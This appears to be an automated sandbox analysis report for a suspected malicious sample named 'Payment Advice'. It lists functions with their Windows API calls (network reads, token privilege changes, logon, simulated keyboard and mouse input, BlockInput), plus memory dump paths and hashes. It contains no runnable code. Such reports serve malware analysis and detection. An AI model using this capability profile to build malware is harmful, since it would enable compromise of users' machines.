Opcode Fuzzy Hash: ceca6a2d5030cfab101ed1d217bdca630ca57a9aa5040c4d92041a564ac56cd1
Instruction Fuzzy Hash: 39D0A7704407139FCB319FA1EC0E6137AD7BB04301F199459E481D2150FFF4C8808690

Function 0059B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0059B22F

Part of subcall function 0059B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0059B5A5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: ffea3dd37e1298b4e473b60d53cbcee6be1ec38f235a0fbe8f041ef86db3d774
Instruction ID: edfddf9ebc5adef3e9ff05ebf049c48facb810539749f869fdc3ba4b811d60fe
Opcode Fuzzy Hash: ffea3dd37e1298b4e473b60d53cbcee6be1ec38f235a0fbe8f041ef86db3d774
Instruction Fuzzy Hash: 7AA1697411410ABAFF28AF6A7E8ED7F2D5EFB82740B144A1DF541D61A1DB299C00D273

Function 005D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 005D4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005D4FD2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 4f84758a3ec2aeadc324dc9d8a7441add9a2aeb31b44098bad155e7d82711db9
Instruction ID: dbde64f5a2f2e942f3c13fa3cea619f9c76ab2ac2f64f23718654c7121e5bbda
Opcode Fuzzy Hash: 4f84758a3ec2aeadc324dc9d8a7441add9a2aeb31b44098bad155e7d82711db9
Instruction Fuzzy Hash: 0141C971504606BFEB309F98DC85EBF7BBCFB80754F10442BF605A6391E6719E419A90

Function 005877B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00587921

Strings

\Qc, xrefs: 00601028

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _memmove
String ID: \Qc
API String ID: 4104443479-3992736305
Opcode ID: 575b6994d83b5978a9baf8735ff9c4cba3bb2005175690df728d1630dbf7b903
Instruction ID: 396292511a302fce3a41246cc2c61978f41565211e2e32a5b1d961a02b45f6d9
Opcode Fuzzy Hash: 575b6994d83b5978a9baf8735ff9c4cba3bb2005175690df728d1630dbf7b903
Instruction Fuzzy Hash: 07A24B74A04219CFDB28DF58C8807ADBBB2FF48314F2585A9D859AB391D7349E81DF90

Function 005CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005CE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 005CE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 005CE2B4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 2c915ef304e8b857bf3b92e3d37b89f54778a10c82c8542e26f70977039be6b8
Instruction ID: 8e336ec7c38d6780516ab0f327accbcee125ca972cab9f90aa10b596d27d104c
Opcode Fuzzy Hash: 2c915ef304e8b857bf3b92e3d37b89f54778a10c82c8542e26f70977039be6b8
Instruction Fuzzy Hash: BF213935A00219EFCB00EFA5D885EAEFFB9FF88314F0484A9E905AB251DB319905CB50

Function 005BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0059F4EA: std::exception::exception.LIBCMT ref: 0059F51E
Part of subcall function 0059F4EA: __CxxThrowException@8.LIBCMT ref: 0059F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005BB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005BB1AD
GetLastError.KERNEL32 ref: 005BB1BA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 27c966a5378a86862bd8f41285c9f927df3f0af2f0c5d414acc45ff3618f1b2a
Instruction ID: ac851f738a4095b6e7ab6b75d03a74456b279134ffbcf83af7f3185f18e4f17f
Opcode Fuzzy Hash: 27c966a5378a86862bd8f41285c9f927df3f0af2f0c5d414acc45ff3618f1b2a
Instruction Fuzzy Hash: BC118FB1504305AFE7189F58DC85D6BBBADFB44710B20852EE45A97241DBB0FC41CB60

Function 005C6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005C6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005C6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005C666F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: d2b7d8bf82a15d27acf8f0693d2bb7882d207c4b94b64048a6f79ac74016a738
Instruction ID: 4144e3ec182dbc55e1e5ad466fe5b2844ef287c3812223db77b157d5ecbe0154
Opcode Fuzzy Hash: d2b7d8bf82a15d27acf8f0693d2bb7882d207c4b94b64048a6f79ac74016a738
Instruction Fuzzy Hash: 1D111E71E01228BFDB108FA5DC45FAFBBBDEB49B50F104666F900E7290D7B05A058BA5

Function 005C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005C7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005C723A
FreeSid.ADVAPI32(?), ref: 005C724A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b93c8360b683542ecf97d28c9345060d40d0ba449b8be6c0e15b3b8abc115e0d
Instruction ID: f4737b2da24726b89577265bac557a2a98540e5016143208b17bfbd06d313afd
Opcode Fuzzy Hash: b93c8360b683542ecf97d28c9345060d40d0ba449b8be6c0e15b3b8abc115e0d
Instruction Fuzzy Hash: 68F01D76A4420DBFDF04DFE4DD89EEEBBB9FF08201F105569A606E2191E3709A448B10

Function 005CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005CF599
FindClose.KERNEL32(00000000), ref: 005CF5C9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7f2df913454a0c6f0e03979c97bafe4d01af88bf3fbfbd5a7bcb77e275786d53
Instruction ID: 14d0a3630edcd4e05586ca6341f0b806bf96d142d5f9025ea4d24947f689bc94
Opcode Fuzzy Hash: 7f2df913454a0c6f0e03979c97bafe4d01af88bf3fbfbd5a7bcb77e275786d53
Instruction Fuzzy Hash: 511165716006019FD710EF68D849A2EB7E5FF84324F04895DF965D7291DF34ED018B81

Function 005CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,005DBE6A,?,?,00000000,?), ref: 005CCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,005DBE6A,?,?,00000000,?), ref: 005CCEB9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 668b61c2504c4c283b7c2194eb954162dda518aa0958adddf0c85fa5aa6ac930
Instruction ID: fbd4e2724cf4aaefd9a23cd21028ab09b053f5fb16aaa40f5ffed56d8f8820dd
Opcode Fuzzy Hash: 668b61c2504c4c283b7c2194eb954162dda518aa0958adddf0c85fa5aa6ac930
Instruction Fuzzy Hash: A5F0823510022ABBDB11ABE4DC49FEA7B6DBF09351F004165F919D6181D6709A44CBA4

Function 005C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 005C4153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 005C4166

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 0e17b95167f83a2354aef30c014f53ab6a99e884a9550cca481cfd290b43f3a5
Instruction ID: 011ed84e5ec9fbd04956bdce241dcf3ee6a5ccc5cc937ef795cb3b4daab37462
Opcode Fuzzy Hash: 0e17b95167f83a2354aef30c014f53ab6a99e884a9550cca481cfd290b43f3a5
Instruction Fuzzy Hash: 12F0177090428DAFDB169FA4CC05BBE7FB4FF04305F04840AF966A6192D7798616DFA4

Function 005BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005BACC0), ref: 005BAB99
CloseHandle.KERNEL32(?,?,005BACC0), ref: 005BABAB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 48bb4d7f87de2c58467842ee6d261468ead48be5db182e11dce852cf1dca84a0
Instruction ID: 273acad64145770b7227a05785230ecac6d5aa0cedadca49c87dd2182e3ad430
Opcode Fuzzy Hash: 48bb4d7f87de2c58467842ee6d261468ead48be5db182e11dce852cf1dca84a0
Instruction Fuzzy Hash: 80E0BF71000511AFEB252F54EC09D777BAAFB44320711C529B45A81470DB626C909B50

Function 005A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,005A6DB3,-0000031A,?,?,00000001), ref: 005A81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005A81BA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 61b7d49d85554375e69f4fa3fee99d190aa7a400794bc2867a93b5e9f405f97c
Instruction ID: 1b803f815b93ba1e219ee3b4d155482c264f767b4bf904f0100d4bed5d456b84
Opcode Fuzzy Hash: 61b7d49d85554375e69f4fa3fee99d190aa7a400794bc2867a93b5e9f405f97c
Instruction Fuzzy Hash: 19B09231084608FBDB082BE1EC09B5A7F6AEB0A652F006110F60D840618BB254108A92

Function 005AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b1e06e2b6acab0f74cad282c1f4fee432a91d9dacdb258407263c5c19441ce
Instruction ID: 87d4b77eed2b29cb845e04f756688211eb0347c20646454849e07cc12a37cd98
Opcode Fuzzy Hash: d0b1e06e2b6acab0f74cad282c1f4fee432a91d9dacdb258407263c5c19441ce
Instruction Fuzzy Hash: C5321621D29F024DD723A634C83233AA699BFB73D4F15E727F81AB5DA6DB29C4834110

Function 005896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 022aa21a8af91336d7eb01ad8f8e3779b0f73f9c210fafeaea94f0372fa0d835
Instruction ID: de071c4bab77f5ba5e31ff94c7b21d68dfcbbf754523f92677a2b33155fae83e
Opcode Fuzzy Hash: 022aa21a8af91336d7eb01ad8f8e3779b0f73f9c210fafeaea94f0372fa0d835
Instruction Fuzzy Hash: AE2277716083069FD724EF14C895B6BBFE4BF84310F14492DF99AAB291DB71E944CB82

Function 005B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ddd6b3f05777e082a9b903fdee336e4184147f19e89b5747ef062d3980e585
Instruction ID: 2e1ccfe544f616c8a135b46d5422cae1fa8d961b2cc07b6af67011bd4f14ec88
Opcode Fuzzy Hash: 02ddd6b3f05777e082a9b903fdee336e4184147f19e89b5747ef062d3980e585
Instruction Fuzzy Hash: E9B1C120D2AF418DD72396398831336FA5DAFBB2D6B95E717FC1B74D62EB2185834180

Function 005CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 005CB6DF

Part of subcall function 005A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,005CBDC3,00000000,?,?,?,?,005CBF70,00000000,?), ref: 005A3453
Part of subcall function 005A344A: __aulldiv.LIBCMT ref: 005A3473

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ca370bea4f25d048e1b43a45c96fd419feb4c44160123f693b3955c16731575f
Instruction ID: 587f7e6a235f2337b14379515fe0ee29d3106d31c946ee3b5e7131d2a7a38915
Opcode Fuzzy Hash: ca370bea4f25d048e1b43a45c96fd419feb4c44160123f693b3955c16731575f
Instruction Fuzzy Hash: F721A2766345108FD72ACF68C481B92BBE1EB95310B248E6DE4E5CB2C0CB74B945CB54

Function 005D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 005D6ACA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 87d1917df3f7083861be3e8e1ce9d2ee164ea31fc456ed1b8639dc034c7c6c47
Instruction ID: 304bcfb125c0ab28f68e07731060621fba915dea3eca6561db2cd27f1cb74bcb
Opcode Fuzzy Hash: 87d1917df3f7083861be3e8e1ce9d2ee164ea31fc456ed1b8639dc034c7c6c47
Instruction Fuzzy Hash: E9E01239210205AFC710EB99D415956BBEDBFA4751F058817E945D7391DAB0E8048BA0

Function 005C74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 005C750A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 4900af337b0591ac168e53c293579dd6fcc9150497ea78af319d336ecc21049d
Instruction ID: ca6bf13c4509b998c87c73dad6f181616055dc95579dd9eb1f21d7efedc46bd4
Opcode Fuzzy Hash: 4900af337b0591ac168e53c293579dd6fcc9150497ea78af319d336ecc21049d
Instruction Fuzzy Hash: F9D067B416C60D6EED1907A49C5BFB71D09B348781FD4954D7612998C0E8D45D05E831

Function 005BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005BAD3E), ref: 005BB124

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 25b66b03294cac999523103569c87bbcbf6f89038200765c9a70040fadeba5f9
Instruction ID: 04f919b979ef92f970edd2c52989f730ed57cc34636aa009212a5eb6bf69fc1c
Opcode Fuzzy Hash: 25b66b03294cac999523103569c87bbcbf6f89038200765c9a70040fadeba5f9
Instruction Fuzzy Hash: 8ED09E321A464EAEDF025FA4DC06EAF3F6AEB04701F449511FA16D50A1C675D531AB50

Function 005FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 005FB352

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

